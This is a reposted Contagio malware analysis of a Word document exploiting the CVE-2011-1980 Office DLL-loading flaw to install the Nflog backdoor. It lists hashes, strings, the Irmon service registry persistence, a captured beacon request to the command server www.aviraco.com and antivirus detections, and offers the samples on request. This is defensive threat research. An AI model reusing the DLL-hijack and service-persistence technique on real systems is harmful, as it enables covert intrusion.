Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog

[Nytro]

[h=3]Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog[/h][h=2]Wednesday, February 15, 2012[/h]On February 9, 2012 Symantec disclosed that the previously patched MS Office insecure library loading vulnerability was exploited in the wild. DLL loading vulnerabilities were used in targeted attacks at least with two other exploits in 2011 and they did not reach epidemic proportions like it happend with CVE-2010-3333 RTF or some of the Adobe PDF exploits. I refer to

Contagio: Sept. 23 CVE-2011-1991 type (1) deskpan.dll Windows components DLL loading vulnerability

and

Contagio: Apr 13 CVE-2011-2100 PDF - Adobe DLL Loading Vulnerability - Agenda.7z

DLL search order hijacking exploits had and will have many new reincarnations because of the DLL loading preference order - Current Working Directory is preferred for most DLL files. You can read more about the root of these problems (not necessarily related to MS Office but in general) in

M-unition: DLL Search Order Hijacking Revisited by Nick Harbour

As described in the

Symantec article, fputlsat.dll must be present in the same directory as the Word document in order to be activated by the ActiveX control embedded in the Word document. The payload of this sample is a backdoor trojan Nflog.

[h=3][/h] [h=3][/h]

[h=3]Common Vulnerabilities and Exposures (CVE)number[/h] [h=3]

CVE-2011-1980 Untrusted search path vulnerability in Microsoft Office 2003 SP3 and 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .ppt, or .xls file, aka "Office Component Insecure Library Loading Vulnerability."[/h]

• [h=3]Microsoft Security Bulletin MS11-073 - Important Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634)[/h]
  
• Symantec: New Targeted Attack Using Office Exploit Found In The Wild by Joji Hamada
  

[h=3][/h] [h=3][/h] [h=3]General File Information[/h] [h=3]File: 275c5ac2067d17187a71b94ccfdc4608.doc

Size: 22016

MD5: 275C5AC2067D17187A71B94CCFDC4608[/h] [h=3]File: fputlsat.dll

Size: 126976

MD5: 60068812B59E58D6338AAEBD649F9020[/h]

[h=3]Download[/h]

Download as a password protected archive (email me if you need the password)

[TABLE]

[TR]

[TD][/TD]

[TD][/TD]

[/TR]

[/TABLE]

[h=3]File Desription[/h]

[h=3]File: 275c5ac2067d17187a71b94ccfdc4608.doc

Size: 22016

MD5: 275C5AC2067D17187A71B94CCFDC4608[/h] [TABLE=class: tr-caption-container]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Before the document is open -

DLL file is present is the same directory[/TD]

[/TR]

[/TABLE]

The Word document has embedded macro - ActiveX List View Form Control, a very common ActiveX control, which calls fputlsat.dll "Microsoft Office FrontPage Client Utility Library". There is nothing unusual about this behavior, you can read more about this particular control here "Using the ListView ActiveX Control" and it is normal for it to call Frontpage libraries.

The vulnerability presents itself in the in the fact that a DLL located in

[TABLE=class: tr-caption-container]

[TR]

[TD=align: center]

[/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]After the document is open.

DLL file is renamed to Thumbs.db[/TD]

[/TR]

[/TABLE]

the same folder as the Word document will be used before the legitimate DLL in C:\Program Files\Microsoft Office\Office\.. or other directories.

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Activity after the exploit launch[/TD]

[/TR]

[/TABLE]

Examination of the ActiveX component shows the original path of the macro/control as it existed on the author's computer C:\Documents and Settings\Bandit\Local Settings\Temp\Word8.0\FPDTC.DLL (nice user name)

Office 8.0 is office 97 (yes, eons ago) and FPDTC.DLL is a Front Page Design Time Control that was used around 2000-2001. Considering this, I wonder if this vulnerability not only existed but also was used with minor tweaks through all versions of MS Office - starting with Office 97 and ending with Office 2010 we finally found it out. Perhaps, Microsoft Office/VB gurus will be able to answer and / or correct me.

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]List view control[/TD]

[/TR]

[/TABLE]

Upon launch, the user is presented with a choice to Run or not to run ActiveX controls. By that time the exploit already worked and the files were dropped/renamed. Anwering Yes will allow the dropped payload iede32.ocx to run.

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]ActiveX prompt.[/TD]

[TD=class: tr-caption, align: center][/TD]

[TD=class: tr-caption, align: center][/TD]

[/TR]

[/TABLE]

The picture below shows locations of the dropped file and the registry changes.

SVCHOST.EXE process injection

[h=3]File: fputlsat.dll

Size: 126976

MD5: 60068812B59E58D6338AAEBD649F9020 [/h] [h=3]fputlsat.dll (thumbs.db) strings[/h] [h=3]Unicode Strings:

---------------------------------------------------------------------------[/h]

[h=3]Adobe Photoshop ---- ???

Adobe Photoshop 6.0 ----- ? Unknown if these artifacts mean anything. Photoshop is just as old. May be same DLL code was used for other products.[/h] [h=3]VS_VERSION_INFO

StringFileInfo

040404b0

Comments

CompanyName

Microsoft Corporation

FileDescription

Microsoft Office FrontPage Client Utility Library

FileVersion

11.0.5510.0

InternalName

FP40CUTL

LegalCopyright

Copyright© Microsoft Corporation 2003. All rights reserved.

LegalTrademarks

OriginalFilename

FP40CUTL

PrivateBuild

ProductName

FP40CUTL.DLL -- Frontpage 2000 file. Wonder if Word 2000 was affected too.

ProductVersion

11, 0, 0, 0

SpecialBuild

VarFileInfo

Translation[/h]

[h=3]Created Files[/h] File: iede32.ocx

Size: 13824

MD5: D4859FC951652B3C9657F8621D4DB625

Virustotal

The trojan starts its activity POST /NfLog/Nfile.asp, this trojan is not new, for example there were Zero day CVE-2011-2462 files carrying the same trojan. The service modified is irmon (frequently abused by these types of attacks - here is a ThreatExpert report of a very common APT backdoor using the same service

List of strings

// Created : 14.02.2012 08:00 // Type : Name List 10001000: SUB_L10001000 10001010: CASE_10001064_PROC0001 10001021: CASE_10001064_PROC0002 10001033: CASE_10001064_PROC0000 1000105A: L1000105A 10001064: CASE_PROCTABLE_10001064 10001080: ServiceMain 1000113A: L1000113A 1000113F: L1000113F 10001152: L10001152 1000115F: L1000115F 10001170: SUB_L10001170 100011C0: L100011C0 100011D1: CASE_10001248_PROC0000 100011E7: CASE_10001248_PROC0004 100011F5: L100011F5 100011F8: CASE_10001248_PROC0001 10001214: CASE_10001248_PROC0002 10001230: CASE_10001248_PROC0003 10001248: CASE_PROCTABLE_10001248 10001260: InstallService 100012A6: L100012A6 100012D8: L100012D8 1000132D: L1000132D 10001339: L10001339 1000135A: L1000135A 1000135F: L1000135F 10001374: L10001374 1000139A: L1000139A 100013DC: L100013DC 10001465: L10001465 1000149F: L1000149F 100014D1: L100014D1 1000151C: L1000151C 10001531: L10001531 10001537: L10001537 1000153A: L1000153A 10001560: RundllInstallA 10001570: UninstallService 100015CD: L100015CD 100015E6: L100015E6 10001614: L10001614 10001628: L10001628 1000162E: L1000162E 1000163E: L1000163E 1000164A: L1000164A 10001660: RundllUninstallA 10001670: SUB_L10001670 100016D9: L100016D9 100016E0: L100016E0 10001726: L10001726 10001764: L10001764 10001789: L10001789 1000178B: L1000178B 100017A5: L100017A5 100017E0: SUB_L100017E0 100017FF: L100017FF 10001901: L10001901 100019CC: L100019CC 10001A8E: L10001A8E 10001A93: L10001A93 10001AA0: SUB_L10001AA0 10001AC5: L10001AC5 10001B03: L10001B03 10001B3B: L10001B3B 10001BF0: SUB_L10001BF0 10001C12: L10001C12 10001C2E: L10001C2E 10001C38: L10001C38 10001C40: SUB_L10001C40 10001C77: L10001C77 10001C80: SUB_L10001C80 10001C9D: L10001C9D 10001CB3: L10001CB3 10001CC9: L10001CC9 10001CD0: SUB_L10001CD0 10001E84: L10001E84 10001E90: SUB_L10001E90 10001EF0: SUB_L10001EF0 10001F57: L10001F57 10001F5D: L10001F5D 10001F71: L10001F71 10001FA7: L10001FA7 10001FCB: L10001FCB 1000200A: L1000200A 1000204B: L1000204B 1000208E: L1000208E 100020C0: SUB_L100020C0 1000212B: L1000212B 1000214F: L1000214F 1000215D: L1000215D 10002170: SUB_L10002170 10002180: L10002180 10002198: L10002198 100021A0: SUB_L100021A0 100021B0: SUB_L100021B0 10002238: L10002238 10002278: L10002278 10002288: L10002288 10002292: L10002292 100022EC: L100022EC 10002300: SUB_L10002300 1000239D: L1000239D 1000239F: L1000239F 100023E9: L100023E9 1000241D: L1000241D 10002446: L10002446 1000247D: L1000247D 100024B3: L100024B3 10002500: SUB_L10002500 10002520: SUB_L10002520 1000255B: L1000255B 100025B8: L100025B8 10002605: L10002605 1000260D: L1000260D 10002613: L10002613 10002630: SUB_L10002630 100026E5: L100026E5 100026FF: L100026FF 10002705: L10002705 10002708: L10002708 10002730: SUB_L10002730 100027D4: L100027D4 100027DA: L100027DA 100027E4: L100027E4 10002800: SUB_L10002800 1000288C: L1000288C 100028EC: L100028EC 100028F2: L100028F2 100028F5: L100028F5 10002920: L10002920 10002936: L10002936 1000293C: jmp_MSVCRT.dll!__CxxFrameHandler 10002950: jmp_MSVCRT.dll!_CxxThrowException 10002956: jmp_MSVCRT.dll!_except_handler3 1000295C: jmp_MSVCRT.dll!??3@YAXPAX@Z 10002962: jmp_MSVCRT.dll!??2@YAPAXI@Z 10002970: SUB_L10002970 1000297C: L1000297C 10002990: L10002990 1000299F: SUB_L1000299F 100029B5: L100029B5 100029DD: L100029DD 100029E1: L100029E1 10002A07: L10002A07 10002A1E: L10002A1E 10002A2F: L10002A2F 10002A34: L10002A34 10002A44: L10002A44 10002A47: L10002A47 10002A4A: EntryPoint 10002A66: L10002A66 10002A70: L10002A70 10002A82: L10002A82 10002A8C: L10002A8C 10002A8E: L10002A8E 10002A92: L10002A92 10002AAE: L10002AAE 10002AB7: L10002AB7 10002AC6: L10002AC6 10002ADD: L10002ADD 10002AE0: L10002AE0 10002AE8: jmp_MSVCRT.dll!??1type_info@@UAE@XZ 10002AEE: jmp_MSVCRT.dll!_initterm 10002B00: L10002B00 10002B10: L10002B10 10002B1B: L10002B1B 10002B30: L10002B30 10003000: ADVAPI32.dll!RegSetValueExA 10003004: ADVAPI32.dll!OpenServiceA 10003008: ADVAPI32.dll!DeleteService 1000300C: ADVAPI32.dll!RegOpenKeyExA 10003010: ADVAPI32.dll!RegQueryValueExA 10003014: ADVAPI32.dll!RegCloseKey 10003018: ADVAPI32.dll!OpenSCManagerA 1000301C: ADVAPI32.dll!CreateServiceA 10003020: ADVAPI32.dll!ChangeServiceConfig2A 10003024: ADVAPI32.dll!CloseServiceHandle 10003028: ADVAPI32.dll!RegisterServiceCtrlHandlerA 1000302C: ADVAPI32.dll!SetServiceStatus 10003030: ADVAPI32.dll!RegCreateKeyA 10003038: KERNEL32.dll!LoadLibraryA 1000303C: KERNEL32.dll!CloseHandle 10003040: KERNEL32.dll!SetFileTime 10003044: KERNEL32.dll!SystemTimeToFileTime 10003048: KERNEL32.dll!CreateFileA 1000304C: KERNEL32.dll!SetEvent 10003050: KERNEL32.dll!OpenEventA 10003054: KERNEL32.dll!GetLastError 10003058: KERNEL32.dll!Sleep 1000305C: KERNEL32.dll!GetModuleFileNameA 10003060: KERNEL32.dll!SetLastError 10003064: KERNEL32.dll!CreateEventA 10003068: KERNEL32.dll!WaitForSingleObject 1000306C: KERNEL32.dll!GetProcAddress 10003070: KERNEL32.dll!FreeConsole 10003074: KERNEL32.dll!GetSystemDirectoryA 10003078: KERNEL32.dll!FreeLibrary 10003080: MSVCRT.dll!??3@YAXPAX@Z 10003084: MSVCRT.dll!??2@YAPAXI@Z 10003088: MSVCRT.dll!atoi 1000308C: MSVCRT.dll!fwrite 10003090: MSVCRT.dll!fclose 10003094: MSVCRT.dll!fopen 10003098: MSVCRT.dll!strstr 1000309C: MSVCRT.dll!sprintf 100030A0: MSVCRT.dll!_snprintf 100030A4: MSVCRT.dll!_strupr 100030A8: MSVCRT.dll!??1type_info@@UAE@XZ 100030AC: MSVCRT.dll!free 100030B0: MSVCRT.dll!_initterm 100030B4: MSVCRT.dll!malloc 100030B8: MSVCRT.dll!_adjust_fdiv 100030BC: MSVCRT.dll!_beginthreadex 100030C0: MSVCRT.dll!_except_handler3 100030C4: MSVCRT.dll!__CxxFrameHandler 100030C8: MSVCRT.dll!strchr 100030CC: MSVCRT.dll!strncat 100030D0: MSVCRT.dll!strncpy 100030D4: MSVCRT.dll!wcstombs 100030D8: MSVCRT.dll!_stricmp 100030DC: MSVCRT.dll!_CxxThrowException 100030E4: WININET.dll!HttpEndRequestA 100030E8: WININET.dll!HttpSendRequestA 100030EC: WININET.dll!HttpAddRequestHeadersA 100030F0: WININET.dll!HttpOpenRequestA 100030F4: WININET.dll!InternetConnectA 100030F8: WININET.dll!InternetSetOptionA 100030FC: WININET.dll!InternetReadFile 10003100: WININET.dll!InternetCloseHandle 10003104: WININET.dll!HttpQueryInfoA 1000310C: WS2_32.dll!WS2_32.9 10003110: WS2_32.dll!WS2_32.52 10003114: WS2_32.dll!WSAIoctl 10003118: WS2_32.dll!WS2_32.116 1000311C: WS2_32.dll!WS2_32.3 10003120: WS2_32.dll!WS2_32.57 10003124: WS2_32.dll!WSASocketA 10003128: WS2_32.dll!WS2_32.115 1000312C: WS2_32.dll!WS2_32.16 10003130: WS2_32.dll!WS2_32.15 10003134: WS2_32.dll!WS2_32.2 10003138: WS2_32.dll!WS2_32.12 10003140: L10003140 1000314C: L1000314C 10003150: L10003150 10003160: L10003160 10003170: L10003170 10003180: L10003180 10003190: L10003190 10003198: L10003198 100031B0: L100031B0 100031B8: L100031B8 100031C8: L100031C8 100031E0: L100031E0 10003200: L10003200 10003220: L10003220 10003230: L10003230 10003240: L10003240 10003260: L10003260 10003270: L10003270 10003288: L10003288 10003298: L10003298 100032B8: L100032B8 100032C0: L100032C0 100032E0: L100032E0 100032F0: L100032F0 10003308: L10003308 10004000: L10004000 10004004: L10004004 10004020: SSZ10004020_www_aviraco_com 10004084: SSZ10004084__IElog 100040E8: L100040E8 100040F0: SSZ100040F0_Network_address_translation_for_ 100041F4: L100041F4 100041F8: SSZ100041F8_SvcHostDLL_exe 10004208: L10004208 10004218: L10004218 10004228: SSZ10004228_RegSetValueEx_ServiceDll_ 10004244: SSZ10004244_ServiceDll 10004250: SSZ10004250_GetModuleFileName___get_dll_path 10004274: SSZ10004274_RegCreateKey_Parameters_ 10004290: SSZ10004290_Parameters 1000429C: SSZ1000429C_SYSTEM_CurrentControlSet_Service 100042C0: SSZ100042C0_IPv6_Stack_Local_Support 100042DC: SSZ100042DC__SystemRoot__System32_svchost_ex 1000430C: SSZ1000430C_RegQueryValueEx_Svchost_netsvcs_ 10004330: SSZ10004330_netsvcs 10004338: SSZ10004338_SOFTWARE_Microsoft_Windows_NT_Cu 10004370: SSZ10004370_Irmon 10004378: SSZ10004378_IEcoreOk 10004384: SSZ10004384_ProcGo 1000438C: SSZ1000438C_GetFile 10004394: SSZ10004394__Nfile_asp 100043A0: L100043A0 100043A4: SSZ100043A4_POST 100043AC: SSZ100043AC_HTTP_1_1 100043B8: SSZ100043B8_Mozilla_4_0__compatible__MSIE_6_ 100043F0: SSZ100043F0_InternetOpenA 10004400: SSZ10004400_wininet_dll 1000440C: L1000440C 10004410: SSZ10004410_InternetSetOptionA 10004424: SSZ10004424_InternetReadFile 10004438: SSZ10004438_InternetConnectA 1000444C: SSZ1000444C_InternetCloseHandle 10004460: SSZ10004460_HttpSendRequestA 10004474: SSZ10004474_HttpQueryInfoA 10004484: SSZ10004484_HttpOpenRequestA 10004498: SSZ10004498_HttpEndRequestA 100044A8: SSZ100044A8__wininet_dll 100044B8: SSZ100044B8_ideo_dll 100044C4: SSZ100044C4_HTTP_1_0 100044D0: L100044D0 100044D4: L100044D4 100044D8: SSZ100044D8_1234567890 100044E4: SSZ100044E4__TestURL_asp 100044F4: L100044F4 100044F8: L100044F8 100044FC: L100044FC 10004500: SSZ10004500_www_microsoft_com 10004514: SSZ10004514_Mozilla_5_0__compatible__MSIE_7_ 10004548: SSZ10004548__s__d 10004550: L10004550 10004554: L10004554 10004558: SSZ10004558_Proxy_Authorization__Basic_ 10004574: SSZ10004574_HEAD 10004580: L10004580 100045A0: L100045A0 100045A4: L100045A4 100045A8: L100045A8 100045AC: L100045AC 100045B0: L100045B0 1000463D: L1000463D 1000483D: L1000483D 1000485D: L1000485D 10004A5D: L10004A5D 10004AE0: L10004AE0 10004AE4: L10004AE4 10004AE8: L10004AE8 10004AEC: L10004AEC 10004AF0: L10004AF0 10004AF4: L10004AF4 10004AF8: L10004AF8 10004AFC: L10004AFC 10004B00: L10004B00 10004B04: L10004B04 10004B08: L10004B08 10004B0C: L10004B0C 10004B10: L10004B10 10004B14: L10004B14 10004F18: L10004F18 10005F1C: L10005F1C 10005F2C: L10005F2C 10005F3C: L10005F3C 10005F40: L10005F40 10006144: L10006144 10006244: L10006244 10006248: L10006248 1000624C: L1000624C 10006250: L10006250 10006254: L10006254

Key Name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Irmon\Parameters

Class Name: <NO CLASS>

Last Write Time: 2/14/2012 - 1:40 AM

Value 0

Name: ServiceDll

Type: REG_EXPAND_SZ

Data: C:\WINDOWS\system32\iede32.ocx

[h=3]Traffic[/h]

In my case, CC was not active or at least I didn't receive any traffic but you can see the initial POST and the domain name.

POST /IElog/TestURL.asp HTTP/1.0

User-Agent: www

Host: www.aviraco.com

Content-Length: 10

Pragma: no-cache

1234567890HTTP/1.1 400 Bad Request

Content-Type: text/html

Date: Tue, 14 Feb 2012 05:39:57 GMT

Connection: close

Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>

Domain Name : aviraco.com

PunnyCode : aviraco.com

Creation Date : 2011-03-30 10:31:10

Updated Date : 2011-03-30 10:31:10

Expiration Date : 2012-03-30 10:31:10

Registrant:

Organization : zhipengwang

Name : zhipengwang

Address : Zhongguancun Hailong Building, Room 1005

City : haidianqu

Province/State : beijingshi

Country : china

Postal Code : 100083

216.83.63.147

Host reachable, 408 ms. average

216.83.32.0 - 216.83.63.255

Ethr.Net LLC

7960B Soquel Dr. #417

Aptos

CA

95003

United States

[TABLE]

[TR]

[TD]IP Address History

Event Date Action Pre-Action IP Post-Action IP

2009-12-28 New -none- 174.37.172.68

2010-09-13 Change 174.37.172.68 67.228.81.181

2010-09-24 Change 67.228.81.181 174.37.172.68

2011-02-02 Change 174.37.172.68 67.228.81.180

2011-02-13 Not Resolvable 67.228.81.180 -none-

2011-10-14 New -none- 98.126.113.28

2011-10-25 Change 98.126.113.28 216.83.63.14

Registrar History

Date Registrar

2009-12-26 Name.com aka DomainSite

2011-03-29 Xin Net

Name Server History

Event Date Action Pre-Action Server Post-Action Server

2009-12-28 New -none- Name.com

2011-02-08 Delete Name.com -none-

2011-03-31 New Xinnet.cn Xinnetdns.com

2011-12-13 Transfer Xinnetdns.com Xincache.com

RR

www.comedns.com. A 216.83.63.147

www.creamofa.com. A 216.83.63.147[/TD]

[TD][/TD]

[/TR]

[/TABLE]

[h=3]Automated Scans[/h] Virustotal

SHA256: 429f206f2c68014c75f8a6ae09e68dd672401e461dd2fa72b9087bb5ee530d1e

SHA1: 7dbf130964cdc0110fd517a5d98188df3d56e850

MD5: 275c5ac2067d17187a71b94ccfdc4608

File size: 21.5 KB ( 22016 bytes )

File name: report.doc

File type: MS Word Document

Detection ratio: 17 / 43

Analysis date: 2012-02-15 04:10:05 UTC ( 46 minutes ago )

Antivirus Result Update

AhnLab-V3 Dropper/Ms11-073 20120213

AVG Exploit_c.UDK 20120213

ClamAV Exploit.Doc-2 20120214

Emsisoft Exploit.MSWord.CVE-2011!IK 20120214

eSafe - 20120213

eTrust-Vet - 20120213

Fortinet W97M/CVE_2011_1980.A!exploit 20120214

Ikarus Exploit.MSWord.CVE-2011 20120214

Kaspersky Exploit.MSWord.CVE-2011-1980.a 20120214

McAfee Exploit-CVE2011-1980 20120214

McAfee-GW-Edition - 20120213

Microsoft Exploit:Win32/Actjack.A 20120213

NOD32 W97M/Exploit.CVE-2011-1980.A 20120214

nProtect Trojan-Exploit/W32.Agent.22016 20120213

PCTools Trojan.Generic 20120207

Sophos Troj/Hijack-H 20120214

SUPERAntiSpyware - 20120206

Symantec Trojan.Activehijack 20120214

TrendMicro TROJ_ACTIVEHIJ.A 20120213

TrendMicro-HouseCall TROJ_ACTIVEHIJ.A 20120214

ViRobot Doc.S.MS11-073.22016 20120213

Virustotal

SHA256: 48bc6c0df3302f7eaa6061c4f3b0357b4c512d5bd6f6088abc6fc274f2efc5aa

SHA1: 8f86b7fcaf0c1ee9b795fa8e559def47ef468128

MD5: 60068812b59e58d6338aaebd649f9020

File size: 124.0 KB ( 126976 bytes )

File name: fputlsat.dll

File type: Win32 DLL

Detection ratio: 28 / 43

Analysis date: 2012-02-15 04:10:02 UTC ( 23 minutes ago )

AhnLab-V3 Win-Trojan/Activehijack.126976 20120213

AntiVir TR/Drop.Kaliox.A 20120213

Avast Win32:Malware-gen 20120214

BitDefender Trojan.Generic.KD.529689 20120214

DrWeb Trojan.MulDrop3.34467 20120214

Emsisoft Trojan-Dropper.Win32.Agent!IK 20120214

F-Secure Trojan.Generic.KD.529689 20120214

Fortinet W32/Agent.PRG!tr 20120214

GData Trojan.Generic.KD.529689 20120214

Ikarus Trojan-Dropper.Win32.Agent 20120214

K7AntiVirus Riskware 20120213

Kaspersky Trojan-Dropper.Win32.Agent.gjnt 20120214

McAfee Generic Dropper.p 20120214

McAfee-GW-Edition Artemis!60068812B59E 20120213

Microsoft TrojanDropper:Win32/Kaliox.A 20120213

NOD32 Win32/TrojanDropper.Agent.PRG 20120214

Norman W32/Agent.XGSO 20120213

nProtect Trojan-Dropper/W32.Agent.126976.CS 20120213

PCTools Trojan.Dropper 20120207

Symantec Trojan.Dropper 20120214

TrendMicro TROJ_MULDROP.IC 20120213

TrendMicro-HouseCall TROJ_MULDROP.IC 20120214

VIPRE Trojan.Win32.Generic!BT 20120214

ViRobot Trojan.Win32.Activehijack.126976 20120213

VirusBuster Trojan.DR.Agent!ly6ZRARwo6A

Virustotal

SHA256: 27c87e7993c5661dd3b65e51df5884519fc0234bf36de72082644fa909ccb793

SHA1: d0c3e34bd97c4aa56fe9f176954d274595926a32

MD5: d4859fc951652b3c9657f8621d4db625

File size: 13.5 KB ( 13824 bytes )

File name: iede32.ocx

File type: Win32 DLL

Detection ratio: 28 / 42

Analysis date: 2012-02-14 04:13:46 UTC ( 1 day, 2 hours ago )

0

AhnLab-V3 Win-Trojan/Activehijack.13824 20120213

AntiVir TR/Spy.13824.71 20120214

Antiy-AVL Trojan/Win32.Genome.gen 20120213

BitDefender Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214

Comodo TrojWare.Win32.GameThief.Nilage.~CRSH 20120214

DrWeb Trojan.Click2.13847 20120214

Emsisoft Trojan.Win32.Spy!IK 20120214

eSafe Win32.GenHeur.LP.Aq@ 20120213

F-Secure Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214

Fortinet W32/Agent.OLJ 20120214

GData Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214

Ikarus Trojan.Win32.Spy 20120214

K7AntiVirus Riskware 20120213

Kaspersky Trojan.Win32.Genome.aehtz 20120214

McAfee Generic Dropper.p 20120214

McAfee-GW-Edition Artemis!D4859FC95165 20120213

Microsoft TrojanDownloader:Win32/Kaliox.A 20120213

NOD32 Win32/Agent.OLJ 20120214

Norman W32/Troj_Generic.KIKX 20120213

nProtect Trojan/W32.Genome.13824.J 20120213

Sophos Troj/Spy-YL 20120214

Symantec Trojan.Gen.2 20120214

TheHacker Trojan/Agent.olj 20120213

TrendMicro BKDR_CONIP.A 20120214

TrendMicro-HouseCall BKDR_CONIP.A 20120214

ViRobot Trojan.Win32.Activehijack.13824 20120214

VirusBuster Trojan.Agent!KGIS/NcFcUc 20120213

Sursa: contagio: Feb 9 CVE-2011-1980 MSOffice DLL Loading vulnerability + Trojan Nflog